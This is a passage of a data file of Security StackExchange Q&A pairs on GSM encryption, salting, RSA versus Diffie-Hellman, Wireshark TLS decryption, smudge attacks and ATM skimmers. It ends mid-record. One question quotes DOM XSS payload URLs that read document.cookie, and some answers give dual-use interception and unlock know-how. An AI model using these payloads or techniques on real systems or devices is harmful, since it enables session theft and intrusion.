source_id
int64 1
4.64M
| question
stringlengths 0
28.4k
| response
stringlengths 0
28.8k
| metadata
dict |
---|---|---|---|
35,376 | When I make a call on my cellphone (on a GSM network), is it encrypted? | For the most part [1] they are encrypted, but not sufficiently enough to be considered as safe, tap resistant encryption. GSM uses 64-bit A5/1 encryption that is weak, to say the least. $15 phone, 3 minutes all that’s needed to eavesdrop on GSM call article from ArsTechnica covers it pretty well IMO, if you care to read more about it. However, it also depends on what you mean by GSM . What I mentioned above is true for what we usually mean as GSM ( 2G , or second generation protocols). 3G are generally considered slighly safer (for lack of a better word): 3G networks offer greater security than their 2G predecessors. By
allowing the UE (User Equipment) to authenticate the network it is
attaching to, the user can be sure the network is the intended one and
not an impersonator. 3G networks use the KASUMI block cipher instead
of the older A5/1 stream cipher. However, a number of serious
weaknesses in the KASUMI cipher have been identified. https://en.wikipedia.org/wiki/3G#Security However: Many operators reserve much of their 3G bandwidth for internet
traffic, while shunting voice and SMS off to the older GSM network. http://arstechnica.com/gadgets/2010/12/15-phone-3-minutes-all-thats-needed-to-eavesdrop-on-gsm-call/ [1] Unencrypted communication (flag A5/0 ) is also supported on GSM systems, and this encryption (or lack thereof) might be regulated by laws of different countries differently, or part of the carrier's policy not to use it. Some devices also display notifications to users when their calls will be encrypted and when not, but most probably felt it's hardly worth bothering notifying users, especially considering the strengths of various cypher suits in use with GSM protocols. See my reply to @HSN's comment below for more information. | {
"source": [
"https://security.stackexchange.com/questions/35376",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/16116/"
]
} |
35,396 | I'm developing web application that uses database. I have to do some operations which needs database table names and db table schema. Will it be secure if I send this kind of information to client side (JavaScript via JSON) or should I keep those information on server side of my application? | Think about it this way On one hand, there's nothing wrong with it. If your application is secure enough against SQL Injection , then an attacker won't be able to do much with that information. Unless you're naming your tables table_2231 and your columns column_4231 (in which case I hate you), it's not gonna be difficult to guess your tables names anyway. If it's a news website, it's very likely you'll have a table called articles , or if you have some subscription service you'll have tables subscribers or users , and so on. Also, if your server is compromised, an attacker will figure out the table names almost immediately. On the other hand, if there's a way around it, there's no need to disclose it. If your security is taken care of, a layer of obscurity wouldn't hurt in that case. In fact, a layer of obscurity on top of good security measures is often a good thing. However, I'm afraid you're trying to do something like this SELECT * FROM $UNTRUSTED_INPUT WHERE blah = 1 In that case, absolutely not . Don't do it. | {
"source": [
"https://security.stackexchange.com/questions/35396",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/12123/"
]
} |
35,460 | I have some data on the server (running Linux) which needs to be encrypted (company policy). This data is being served by an application running on this machine. Now I consider a few possibilities: 1) Encrypt only the partition on which the data resides (by the OS). 2) Encrypt only the data in question (some 3rd party software) but not the whole partition. 3) Encrypt everything. Which option would you recommend? The thing I am most concerned about is performance as this data is heavily utilized. Currently we don't have a possibility of using encrypted SAN disks. The above seem to be the only options. Could you please tell me which option is the best and what software/tools would you recommend to implement it? | There are a number of defenses you can use to help prevent and recover from theft. The first thing you should look into is full-disk encryption, e.g. LUKS , TrueCrypt , or PGP . This will prevent an attacker from reading any data on the disk, even if they steal the hardware. You will need to enter the password at boot, though, so for unattended remote hardware this might be problematic unless you have access to lights-out management (e.g. HP iLO or Dell DRAC). On top of this, you should ensure several other mechanisms are in place: Strong physical security in your data center (e.g. locks, biometrics, CCTV, alarms) Security procedures should be put in place at the data center. All people entering should be made to sign in, and all hardware access / changes should be logged and signed for. Good server racks come with appropriate fixtures for padlocking servers in place. If available, this feature should be used. Select a strong padlock that is resistant to bolt croppers and shivs. BIOS administrative password set, to prevent the boot order being changed. BIOS boot password set, if possible (may require physical attendance at boot) Application credentials can be stored in a dedicated HSM to help prevent recovery of data in the event of theft. Epoxy resin can be used to disable physical ports, to prevent unauthorised devices from being plugged into the system. Asset IDs should be properly set in the BIOS or server management console, and should be logged in an assets registry. UV ink should be used to tag all devices. You can buy UV security pens very cheaply, and they're very useful for property identification in the case of theft. It is often worth marking individual hard disks as well as the server chassis. Tamper-evident mechanisms, e.g. security tape, can be used to ensure that the hardware has not been tampered with. A quick and easy way to use it is to tape up the server and sign the tape with a marker pen. If the server is opened later, the seal will be broken. New tape applied over the top will not carry the same signature. | {
"source": [
"https://security.stackexchange.com/questions/35460",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/25652/"
]
} |
35,471 | I often see RSA being recommended as a method of key exchange. However, the Diffie-Hellman key exchange method appears to be secure as well. Is there any considerations one should take into account that would lead to using one algorithm over the other? | The situation can be confused, so let's set things right. RSA is two algorithms, one for asymmetric encryption, and one for digital signatures . These are two distinct beast; although they share the same core mathematical operation and format for keys, they do different things in different ways. Diffie-Hellman is a key exchange algorithm, which is yet another kind of algorithm. Since the algorithms don't do the same thing, you could prefer one over the other depending on the usage context. Asymmetric encryption and key exchange are somewhat equivalent: with asymmetric encryption, you can do a key exchange by virtue of generating a random symmetric key (a bunch of random bytes) and encrypting that with the recipient's public key. Conversely, you can do asymmetric encryption with key exchange by using the key resulting from the key exchange to encrypt data with a symmetric algorithm, e.g. AES . Moreover, Diffie-Hellman is a one-roundtrip key exchange algorithm: recipient sends his half ("DH public key"), sender computes his half, obtains the key, encrypts, sends the whole lot to the recipient, the recipient computes the key, decrypts. This is compatible with a one-shot communication system, assuming a pre-distribution of the public key, i.e. it works with emails. So for the rest of this answer, I assume we are talking about RSA encryption . Perfect Forward Secrecy is a nifty characteristic which can be summarized as: actual encryption is done with a key which we do not keep around, thus immune to ulterior theft. This works only in a setup in which we do not want to keep the data encrypted, i.e. not for emails (the email should remain encrypted in the mailbox), but for data transfer like SSL/TLS . In that case, to get PFS, you need to generate a transient key pair (asymmetric encryption or key exchange) for the actual encryption; since you usually also want some sort of authentication, you may need another non-transient key pair at least on one side. This is what happens in SSL with the "DHE" cipher suites: client and server use DH for the key exchange, with newly generated DH keys (not stored), but the server also needs a permanent key pair for signatures (of type RSA, DSA, ECDSA...). There is nothing which intrinsically prohibits generating a transient RSA key pair. Indeed, this was supported in older versions of SSL; see TLS 1.0 , section 7.4.3. In that case, use of an ephemeral RSA key was mandated not for PFS, but quite the opposite: so that encryption keys, while not stored, could be broken afterwards, even if the server's permanent key was too large to be thus brutalized. There is, however, an advantage of DH over RSA for generating ephemeral keys: producing a new DH key pair is extremely fast (provided that some "DH parameters", i.e. the group into which DH is computed, are reused, which does not entail extra risks, as far as we know). This is not a really strong issue for big servers, because a very busy SSL server could generate a new "ephemeral" RSA key pair every ten seconds for a very small fraction of his computing power, and keep it in RAM only, and for only ten seconds, which would be PFSish enough. Nevertheless, ephemeral RSA has fallen out of fashion, and, more importantly, out of standardization. In the context of SSL , if you want PFS, you need to use ephemeral DH (aka "DHE"), because that's what is defined and supported by existing implementations. If you do not want PFS, in particular if you want to be able to eavesdrop on your own connections or the connections of your wards (in the context of a sysadmin protecting his users through some filters, or for some debug activities), you need non-ephemeral keys. There again, RSA and DH can be used. However, still in the context of SSL, non-ephemeral DH requires that the server's key, in its X.509 certificate , contains a DH public key. DH public keys in certificates were pushed by the US federal government back in the days when RSA was patented. But these days are long gone. Moreover, DH support was never as wide as RSA support. This is indeed an interesting example: DH was government approved, and standardized by an institutional body (as ANSI X9.42 ); on the other hand, RSA was standardized by a private company who was not officially entitled in any way to produce standards. But the RSA standard ( PKCS#1 ) was free for anyone to read, and though there was a patent, it was valid only in the USA, not the rest of the world; and in the USA, RSA (the company) distributed a free implementation of the algorithm (free as long as it was for non-commercial usages). Amateur developers, including Phil Zimmerman for PGP, thus used RSA, not DH. The price of the standard is nothing for a company, but it can mean a lot for an individual. This demonstrates the impetus that can originate, in the software industry, from amateurs. So that's one advantage of RSA over DH : standard is freely available. For security , RSA relies (more or less) on the difficulty of integer factorization , while DH relies (more or less) on the difficulty of discrete logarithm . They are distinct problems. It so happens that the best known breaking algorithms for breaking either are variants of the General Number Field Sieve , so they both have the same asymptotic complexity . From a high-level view, a 1024-bit DH key is as robust against cryptanalysis as a 1024-bit RSA key. If you look at the details, though, you may note that the last part of GNFS, the "linear algebra" part, which is the bottleneck in the case of large keys, is simpler in the case of RSA. That part is about reducing a terrifyingly large matrix. In the case of RSA, the matrix elements are just bits (we work in GF(2) ), whereas for DH the matrix elements are integer modulo the big prime p . This means that the matrix is one thousand times bigger for DH than for RSA. Since matrix size is the bottleneck, we could state that DH-1024 is stronger than RSA-1024. So that's one more advantage of DH: it can be argued that it gives some extra robustness over RSA keys of the same size . Still for security, DH generalizes over other groups, such as elliptic curves . Discrete logarithm on elliptic curves is not the same problem as discrete logarithm modulo a big prime; GNFS does not apply. So there is not one Diffie-Hellman, but several algorithms. "Cryptodiversity" is a good thing to have because it enables us to switch algorithms in case some researcher finds a way to easily break some algorithms. As for performance : RSA encryption (with the public key) is substantially cheaper (thus faster) than any DH operation (even with elliptic curves). RSA decryption (with the private key) entails more or less the same amount of work as DH key exchange with similar resistance. DH is a bit cheaper if it uses a permanent key pair, but a bit more expensive if you include the cost for building an ephemeral key pair. In the case of SSL and DHE_RSA, the server must generate a DH key pair and sign it, and the signature includes the client and server random values, so this must be done for each connection. So choosing "DHE_RSA" instead of "RSA" kind-of doubles the CPU bill on the server for SSL -- not that it matters much in practice, though. It takes a very busy server to notice the difference. A DH public key is bigger to encode than a RSA public key, if the DH key includes the DH parameters; it is smaller otherwise. In the case of SSL, using DHE_RSA instead of RSA means exchanging one or two extra kilobytes of data -- there again, only once per client (because of SSL session reuse), so that's hardly a crucial point. In some specialized protocols, ECDH (with elliptic curves) gets an important edge because the public elements are much smaller. If you are designing a protocol in a constrained situation (e.g. involving smart cards and I/O over infrared or anything similarly low-powered), ECDH will probably be more attractive than RSA. Summary: you will usually prefer RSA over DH, or DH over RSA, based on interoperability constraints: one will be more supported than the other, depending on the context. Performance rarely matters (at least not as much as is often assumed). For SSL , you'll want DH because it is actually DHE, and the "E" (as ephemeral) is nice to have, because of PFS. | {
"source": [
"https://security.stackexchange.com/questions/35471",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
35,523 | I'm implementing a salt function for user passwords on my web page, and I'm wondering about some things. A salt is an extension added to a password and then hashed, meaning the password is stored in the database as hash(password+salt) . But where does one store the salt? A salt is simply to make rainbow tables "useless", right? Couldn't an attacker just build a rainbow table, then convert all the hashes and remove the salt? After all, the salt is stored somewhere in the database. Therefore, if one can find the hashed passwords one should be able to find the corresponding salts. It seems to me that a salt only makes passwords longer, forcing the rainbow table to run longer. So how does one maximise the effectiveness of a salt? I don't really see multiple security reasons for it, aside from making the passwords longer dynamically, but then again one could convert them to bits in a string instead. Are my assumptions about how a salt works correct? If not, how should I store it and the salted passwords correctly? | You have a fundamental misconception of how rainbow tables work. A rainbow table or a hash table is built by an attacker prior to an attack. Say I build a hash table containing all the hashes of strings below 7 characters for MD5 . If I compromise your database and obtain list of hashes, all I have to do is lookup the hash on the table to obtain your password. With a salt, you cannot generate a rainbow table for a specific algorithm prior to an attack. A salt is not meant to be secret, you store it alongside the hash in your database. x = hash(salt+password) You will then store it in your database in the format of salt+x This renders rainbow tables and hash tables useless. As usual don't roll your own, use bcrypt , scrypt or pbkdf2 which takes care of all the details including salting for you. See How to securely hash passwords? | {
"source": [
"https://security.stackexchange.com/questions/35523",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/20814/"
]
} |
35,528 | In my organization, users have the rights to transfer files to and from servers using SSH File Transfer protocol for a variety of reasons; e.g. application troubleshooting, BAU, etc. Although our servers are configured with logging to keep track of what users have done, we would still like to control the file transfer operation done by the users in a sense that we would like to make it as a privileged operation and is allowed when a user have raised a valid request; not as and when they please. The most effective way that I could think of is manually enabling / disabling the SFTP service whenever there is a request and having the user perform the file transfer operation on a dedicated workstation. But it does sound a bit strenuous though. For FSI institutions, how do they control such operation? | You have a fundamental misconception of how rainbow tables work. A rainbow table or a hash table is built by an attacker prior to an attack. Say I build a hash table containing all the hashes of strings below 7 characters for MD5 . If I compromise your database and obtain list of hashes, all I have to do is lookup the hash on the table to obtain your password. With a salt, you cannot generate a rainbow table for a specific algorithm prior to an attack. A salt is not meant to be secret, you store it alongside the hash in your database. x = hash(salt+password) You will then store it in your database in the format of salt+x This renders rainbow tables and hash tables useless. As usual don't roll your own, use bcrypt , scrypt or pbkdf2 which takes care of all the details including salting for you. See How to securely hash passwords? | {
"source": [
"https://security.stackexchange.com/questions/35528",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/25699/"
]
} |
35,619 | I came across this Intel How Strong is Your Password? page which estimates how strong your password is. It has some advice on choosing better passwords including that you should use multiple passwords. But then after it says this: Step 3: Diversify your social passwords for added security "My 1st Password!: Twitr" "My 1st Password!: Fb" "My 1st Password!: Redd" Does this increase security over just using "My 1st Password!"? I thought the reason not to use the same password more than once is so that if a site compromised, your passwords for other sites are still safe. But if your password here was "UltraSecurePassword: StackExchange" wouldn't it be easy to guess your Facebook password would be "UltraSecurePassword: FB"? | Yes you are right. Using a pool of passwords is definitely recommended but the passwords should not follow a pattern, but that is how we think (we are security guys). May be the writer was thinking from a common user's point of view because most common users simply don't want to take the headache of remembering multiple passwords and having a common pattern in all the passwords may encourage them to use different passwords because now the passwords are much easier to remember (and easier to guess by a smart hacker). I personally prefer to maintain a pool of passwords.Nowadays you have to create an account with a number of random websites and you don't know how they are handling your passwords. I remember once on a job portal (read monster.com) I clicked on forgot password and then they mailed me my original password in plain text (they are still doing it!!!). Here in our community we have some great discussions on password management but there are people out there who do not care for your security. One should never use his bank related and other important passwords any where else. You can always remember a comparatively simpler password for these random websites. | {
"source": [
"https://security.stackexchange.com/questions/35619",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/25751/"
]
} |
35,635 | Someone told me that showing your IP address in a URL (like http://192.0.2.34/default.html ) is easier to hack. Is that true? I could trace any domain name and get its IP number as well. | Easier to hack? No. Easier to DoS? Potentially. Using an IP address instead of a host name with a DNS entry means you're giving up a layer of routing flexibility that can be very beneficial. For example, if malware targets your IP address in a DoS attack, if you're using a domain name, you switch the IP address of the site and in the DNS record, and the attack is over without your users knowing the difference. If your users are making requests directly to your IP, however, that isn't an option. You're tied to that IP unless you want to inconvenience (and possibly lose) your users along the way. | {
"source": [
"https://security.stackexchange.com/questions/35635",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/12493/"
]
} |
35,639 | How can I decrypt TLS messages when an ephemeral Diffie-Hellman ciphersuite is used? I am able to expose the premaster secret and master secret from the SSL Client. Using that, how to decrypt the messages in Wireshark? | Some background: Wireshark supports decryption of SSL sessions when the master secret can be calculated (which can be derived from a pre-master secret). For cipher suites using the RSA key exchange, the private RSA key can be used to decrypt the encrypted pre-master secret. For ephemeral Diffie-Hellman (DHE) cipher suites, the RSA private key is only used for signing the DH parameters (and not for encryption). These parameters are used in a DH key exchange, resulting in a shared secret (effectively the pre-master secret which is of course not visible on the wire). Wireshark supports various methods to decrypt SSL: By decrypting the pre-master secret using a private RSA key. Works for RSA key exchanges and subject to the above limitation. Using a SSL keylog file which maps identifiers to master secrets. The available identifiers are: The first 8 bytes (16 hex-encoded chars) of an encrypted pre-master secret (as transmitted over the wire in the ClientKeyExchange handshake message). ( RSA XXX YYY , since Wireshark 1.6.0 ) The 32 bytes (64 bytes hex-encoded chars) within the Random field of a Client Hello handshake message. ( CLIENT_RANDOM XXX YYY , since Wireshark 1.8.0 ) A variant that maps the Client Random to a pre-master secret (rather than master-secret) also exists. ( PMS_CLIENT_RANDOM XXX ZZZ , since Wireshark 2.0 ) Another variant exists to support TLS 1.3 and maps the Client Random to respective secrets. Instead of CLIENT_RANDOM , the key is one of CLIENT_EARLY_TRAFFIC_SECRET , CLIENT_HANDSHAKE_TRAFFIC_SECRET , SERVER_HANDSHAKE_TRAFFIC_SECRET , CLIENT_TRAFFIC_SECRET_0 or SERVER_TRAFFIC_SECRET_0 . Since Wireshark 2.4 . The Session ID field of a Server Hello handshake message. ( RSA Session-ID:XXX Master-Key:YYY , since Wireshark 1.6.0 ) The Session Ticket in a Client Hello TLS extension or Session Ticket handshake message. ( RSA Session-ID:XXX Master-Key:YYY , since Wireshark 1.11.3 ) To generate such a SSL key log file for a session, set the SSLKEYLOGFILE environment variable to a file before starting the NSS application. Example shell commands for Linux: export SSLKEYLOGFILE=$PWD/premaster.txt
firefox On Windows you need to set a global environment variable, either via cmd (invoke setx SSLKEYlOGFILE "%HOMEPATH%\Desktop\premaster.txt" for example) or via the System configuration panel. After doing so, you can launch Firefox via the icon. Note : (Linux) users of Firefox with NSS 3.24+ are possibly unable to use this method because Firefox developers disabled this by default . The SSL key log file can be configured for Wireshark at Edit -> Preferences , Protocols -> SSL , field (Pre)-Master-Secret log filename (or pass the -o ssl.keylog_file:path/to/keys.log to wireshark or tshark ). After doing this, you can decrypt SSL sessions for previous and live captures. Should you encounter a situation where you still cannot decrypt traffic, check: whether the key log file path is correct (use absolute paths in case the program changes the working directory). whether the key log file actually contains key material for your program. whether Wireshark was compiled with GnuTLS (I have tested Wireshark 1.10.1 with GnuTLS 3.2.4 and libgcrypt 1.5.3) whether other sessions can be decrypted. For instance, I tried https://lekensteyn.nl/ which works, but a site using a Camellia cipher suite failed. If you still cannot decrypt all traffic, it is possible that Wireshark contains a bug (in my case it was missing support for Camellia). To start debugging, save your capture and start wireshark with SSL logging enabled: wireshark -o ssl.debug_file:debug.txt savedcapture.pcapng After the capture has been loaded, you can close the program again. (You do not actually need to save the capture, but it makes it easier to reproduce the issue and avoid further noise in the log dump.) You might see something similar to the line below: ssl_generate_keyring_material not enough data to generate key (0x33 required 0x37 or 0x57) These numbers are a combination of the constants defined in epan/dissectors/packet-ssl-utils.h : 215-#define SSL_CLIENT_RANDOM (1<<0)
216-#define SSL_SERVER_RANDOM (1<<1)
217:#define SSL_CIPHER (1<<2)
218-#define SSL_HAVE_SESSION_KEY (1<<3)
219-#define SSL_VERSION (1<<4)
220-#define SSL_MASTER_SECRET (1<<5)
221-#define SSL_PRE_MASTER_SECRET (1<<6) As you can see, I am missing the SSL_MASTER_SECRET (0x20) here. Looking further in the log file, I can also find: dissect_ssl3_hnd_srv_hello can't find cipher suite 0x88 This cipher suite is indeed missing from the cipher_suites structure defined in epan/dissectors/packet-ssl-utils.c . After studying RFC 5932 - Camellia Cipher Suites for TLS , I found the required parameters for a CipherSuite .
The resulting patch should then be submitted to Wireshark as I did here: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9144 . The stable 1.12 series have vastly improved cipher suite and TLS support, so you should not have to manually patch it now. | {
"source": [
"https://security.stackexchange.com/questions/35639",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/25804/"
]
} |
35,691 | I have problems to understand what is the difference between the serial number of a certificate and its SHA1 hash. The MSDN says: Serial number A number that uniquely identifies the certificate and
is issued by the certification authority. So can I identify a certificate by its serial number, right? Wikipedia says for the hash: Thumbprint: The hash itself, used as an abbreviated form of the public
key certificate. So the hash identifies the (e.g. RSA) key. I currently do some research on Android app certificates and I found some interesting certificates: [Issuer][Serial][SHA1 Hash][Valid From]
[C=US, L=Mountain View, S=California, O=Android, OU=Android, CN=Android, [email protected]][00936EACBE07F201DF][BB84DE3EC423DDDE90C08AB3C5A828692089493C][Sun, 29 Feb 2008 01:33:46 GMT]
[C=US, L=Mountain View, S=California, O=Android, OU=Android, CN=Android, [email protected]][00936EACBE07F201DF][6B44B6CC0B66A28AE444DA37E3DFC1E70A462EFA][Sun, 29 Feb 2008 01:33:46 GMT]
[C=US, L=Mountain View, S=California, O=Android, OU=Android, CN=Android, [email protected]][00936EACBE07F201DF][0B4BE1DB3AB39C9C3E861AEC1348110062D3BC1B][Sun, 29 And there are a lot more which share the same serial, but have different hashes. So there can be a certificate with different key? Who is actually creating the serial number when creating a certificate for an Android app? For the hash it is clear, but can I create a new certificate with the same serial number as another cert? Can I be sure that a certificate with the same serial number was created by the same person? | In a certificate , the serial number is chosen by the CA which issued the certificate. It is just written in the certificate. The CA can choose the serial number in any way as it sees fit, not necessarily randomly (and it has to fit in 20 bytes). A CA is supposed to choose unique serial numbers, that is, unique for the CA . You cannot count on a serial number being unique worldwide; in the dream world of X.509, it is the pair issuerDN+serial which is unique worldwide (each CA having its own unique distinguished name, and taking care not to reuse serial numbers). The thumbprint is a hash value computed over the complete certificate, which includes all its fields, including the signature. That one is unique worldwide, for a given certificate, up to the inherent collision resistance of the used hash function. Microsoft software tends to use SHA-1, for which some theoretical weaknesses are known, but no actual collision has been produced (yet) . A collision attack on SHA-1 has now been demonstrated by researchers from CWI and Google. (The thumbprints you show appear to consist of 40 hexadecimal characters, i.e. 160 bits, which again points at SHA-1 as the plausibly used hash function.) | {
"source": [
"https://security.stackexchange.com/questions/35691",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/25805/"
]
} |
35,738 | I am a small business owner. My website was recently hacked, although no damage was done; non-sensitive data was stolen and some backdoor shells were uploaded. Since then, I have deleted the shells, fixed the vulnerability and blocked the IP address of the hacker. Can I do something to punish the hacker since I have the IP address? Like can I get them in jail or something? This question was featured as an Information Security Question of the Week . Read the Feb 05, 2016 blog entry for more details or submit your own Question of the Week . | You don't punish the hacker. The law does. Just report whatever pieces of information you have to the police and let them handle it. However, it is very unlikely that the attacker will be caught. The IP address you posses most likely belongs to another system that the attacker has compromised and is using as a proxy. Just treat it as a lesson learnt and move on. | {
"source": [
"https://security.stackexchange.com/questions/35738",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/25835/"
]
} |
35,758 | Reading about DOM based XSS from http://www.webappsec.org/projects/articles/071105.shtml It illustrates some examples like: http://www.vulnerable.site/welcome.html?foobar=name=<script>alert(document.cookie)<script>&name=Joe and http://www.vulnerable.site/attachment.cgi?id=&action=foobar#<script>alert(document.cookie)</script> 1) In what sequence does a server and a browser parse javascript? Let's say for example 1), as soon as the above request is typed in a browser and sent to vulnerable.site, the cgi would handle the request via GET/POST parameters. Here, it would extract the required values from the GET/POST request, do some server side processing and return back a response in html. So where is the javascript in one of the parameters embedded in the response? 2) Similarly, for example 2) i read that # character would prevent the to be sent to the server side. So the server will only receive a request like http://www.vulnerable.site/attachment.cgi?id=&action=foobar and not the complete url. So what happens to the javascript that follows? Does the browser run it directly? | You don't punish the hacker. The law does. Just report whatever pieces of information you have to the police and let them handle it. However, it is very unlikely that the attacker will be caught. The IP address you posses most likely belongs to another system that the attacker has compromised and is using as a proxy. Just treat it as a lesson learnt and move on. | {
"source": [
"https://security.stackexchange.com/questions/35758",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/18112/"
]
} |
35,780 | In personal mode WPA2 is more secure than WPA. However, I have read that WPA Enterprise provides stronger security than WPA2 and I am unsure exactly how this is achieved. | The PSK variants of WPA and WPA2 uses a 256-bit key derived from a password for authentication. The Enterprise variants of WPA and WPA2, also known as 802.1x uses a RADIUS server for authentication purposes. Authentication is achieved using variants of the EAP protocol. This is a more complex but more secure setup. The key difference between WPA and WPA2 is the encryption protocol used. WPA uses the TKIP protocol whilst WPA2 introduces suport for the CCMP protocol. | {
"source": [
"https://security.stackexchange.com/questions/35780",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
35,818 | Following my answer . If I can list contents of a password-protected ZIP file, check the file types of each stored file and even replace it with another one, without actually knowing the password, then should ZIP files be still treated as secure? This is completely insecure in terms of social engineering / influence etc. I can hijack (intercept) someone else's file (password-protected ZIP file) and I can replace one of the files it contains, with my one (fake, virus) without knowing the password. Replaced file will remain unencrypted, not password-protected inside the
ZIP, but other files won't be modified. If a victim unpacks a password-protected archive, extracting program will ask for the password only once, not every time per each file. So end user will not see the difference -- whether the program does not ask for a password, because it already knows it (original file) or because the file being extracted doesn't need a password (file modified by me). This way, I can inject something really bad into a password-protected ZIP file, without knowing its password and count on the receiver assuming the file is unmodified. Am I missing something or is this really wrong? What can we say about the security terms of a solution, if password is not required to introduce any modification in a password-protected file? | To answer this, there needs to be a better definition of "secure" and/or "safe". It's always got to be defined in light of the purpose of the protection and the risk to the system. There's no one size fits all here, what's "safe enough" for one system, may be abysmally weak on another. And what's "safe enough" on another may be cost prohibitive or down right impractical in a different case. So, taking the typical concerns one by one: Confidentiality - marginal at best. Confidentiality is usually rated in terms of how long it will take to gain access to the protected material. I may be able to change the zip file, but as a hacker it'll take me some amount of time either crack the password or brute force it. Not a lot of time, passwords are one of the weaker protections, and given the way zip files are often shared, social engineering one's way to the password is usually not hard. Integrity - nope - as the asker points out - it's easy to change the package and make it look legitimate. Availability - generally not applicable to this sort of security control - this usually refers to the risk of making a service unavailable - the data storing/packaging usually doesn't affect availability one way or the other. Non repudiation - nope, no protection - anyone can modify the package, so anyone contributing to it has probable deniability. The trick is - how much better do you want to get? Encrypted email is an option - as a better protection. Although it poses it's own connectivity concerns. And there's many better ways to encrypt data - but the better options also involve key distribution challenges that can add time and cost concerns. As a quick way to package and share some data that you don't want to make completely public - it's better than nothing, and it's sometimes the only common denominator you can work out. For anything high-risk, I'd find a better option. | {
"source": [
"https://security.stackexchange.com/questions/35818",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/11996/"
]
} |
35,828 | Some Flash developers are afraid of JavaScript. Their point of view: Stealing JS source code is effortless, one would just 'view source' and copy it. Yes, you can decompile Flash bytecode, however it requires more time and knowledge. As a result, JavaScript is not suitable for commercial software development, because competitors will steal the code and put the original developer out of business. Does obfuscating JavaScript code make sense when developing commercial web applications? Are there any obfuscation techniques that actually work? Are large companies like Google obfuscating their web application code. For example are Gmail or Google Drive somehow protected? | I think the operative word in the question here is "afraid." The aversion is based on fear, not fact. The reality is, the threat model isn't particularly realistic. Commercial web software development companies nearly universally use JavaScript these days, obfuscated or otherwise, and I challenge you to find me even a single example of one that's had it's JS stolen by a competitor and then been driven out of business because of it. I'm quite confident that it hasn't happened, and isn't likely too. Too your second question, do companies like Google obfuscate their JavaScript? Yes, but not for security! They obfuscate to minimize the size of the code, in order to reduce the download size and minimize the page load times. (See the Google Closure Compiler .) This is not necessarily how you'd obfuscate for security because the only goal is to minimize the number of bytes that have to be delivered to the client. This is what you should be focused on with JavaScript, not worrying about whether someone will be able to read it or not. | {
"source": [
"https://security.stackexchange.com/questions/35828",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/22252/"
]
} |
35,831 | Suppose I use KeePassX as a password manager, and I store the kdb file in Sparkleshare folder as a way for backing up and syncing with multiple devices. The kdb file in itself would be encrypted, but if someone stole the git repo, they technically would have many versions of the same file with minor variations. Would that in any way reduce the security of the file? | If the encryption algorithm in question is weak against a Ciphertext-only attack, having multiple variants of an encrypted files might allow an attacker to decipher the ciphertext. All strong encryption algorithms including AES isn't susceptible to such attacks. You should be fine. | {
"source": [
"https://security.stackexchange.com/questions/35831",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/13510/"
]
} |
36,030 | After eating some garlic bread at a friend's who is not security-aware, she managed to quickly determine the PIN code to unlock the screen of my Samsung SIII. She figured this out by simply holding the device against the light and looking at the grease pattern my thumb left on the screen. It only took her 2 attempts to unlock the screen. I guess she would not have been able to access my phone if I had kept the screen cleaner, or if the device could only be unlocked by pressing numbers, rather than dragging the finger to form a pattern. Is this a common means of attack? Are finger dragging pattern passwords really more insecure than number touch passwords? | This is known as a 'Smudge Attack' It really depends on how much you've used your phone since you've last unlocked it, but the general principle still stands. If you use the pattern feature of Android phones, this can be particularly obvious. The University of Pennsylvania published a research paper on the topic and basically concluded that they could figure out the password over 90 percent of the time. The study also found that “pattern smudges,” which build up from writing the same password numerous times, are particularly recognizable. Furthermore: “We showed that in many situations full or partial pattern recovery is
possible, even with smudge ‘noise’ from simulated application usage or
distortion caused by incidental clothing contact,” While this is a plausible risk, It is not a particularly practical vulnerability as an attacker needs physical access to your phone. Using a PIN Code over a pattern may reduce the chance of this presenting a threat but it still exists depending on the strength of your PIN and the cleanliness of your hands/screen. However, these same researchers postulate another possible attack using the heat residue left by contact between your fingers and the screen which would be another problem altogether. Obviously, cleaning your screen after every use is a practical (and not too difficult) defense against this specific attack. I'd expect that if you have used your phone (say to make calls/send a message/any kind of web browsing) it would also sufficiently obfuscate the patterns/codes. From examining my screen this seems to be the case. | {
"source": [
"https://security.stackexchange.com/questions/36030",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/20008/"
]
} |
36,135 | This question has been bothering me ever since I first heard of ATM skimmers : Instances of skimming have been reported where the perpetrator has put
a device over the card slot * of an ATM (automated teller machine),
which reads the magnetic strip as the user unknowingly passes their
card through it. These devices are often used in conjunction with
a miniature camera (inconspicuously attached to the ATM) to read the
user's PIN at the same time. This method is being used very
frequently in many parts of the world... source: Wikipedia * ATM skimmer device being installed on front of existing bank card slot (source: hoax-slayer.com ) Banks have so far responded to such threats by installing all kinds of anti-skimmer fascias and see-through plastic slot covers on their ATMs , spent great deal on educating consumers on how to detect such devices with informative brochoures, warning stickers on ATMs themselves, even added helpful information to ATM displays' welcome screens and whatnot, and yet I still can't think of a single, simple and bulletproof way of establishing whether any particular ATM is safe to use, or it might have been tampered with and devices installed onto it to collect our credit card information and record our PINs. Anti-fraud/anti-skimming device Here are a few suggestions I've been reading about: Check for cameras : Sometimes hackers looking to get PINs put cameras on the light above the keypad. Feel the top for anything
protruding that could be a camera. Pull on the card slot : Card stealers can't spend a long time messing with an ATM, so card skimmers are often easy to instal and
remove. If the card reader at the ATM moves or seems loose, don't risk
it. Wiggle the keypad : Hackers sometimes put fake keypads over the real one to figure out your PIN. If the keypad seems loose, try a
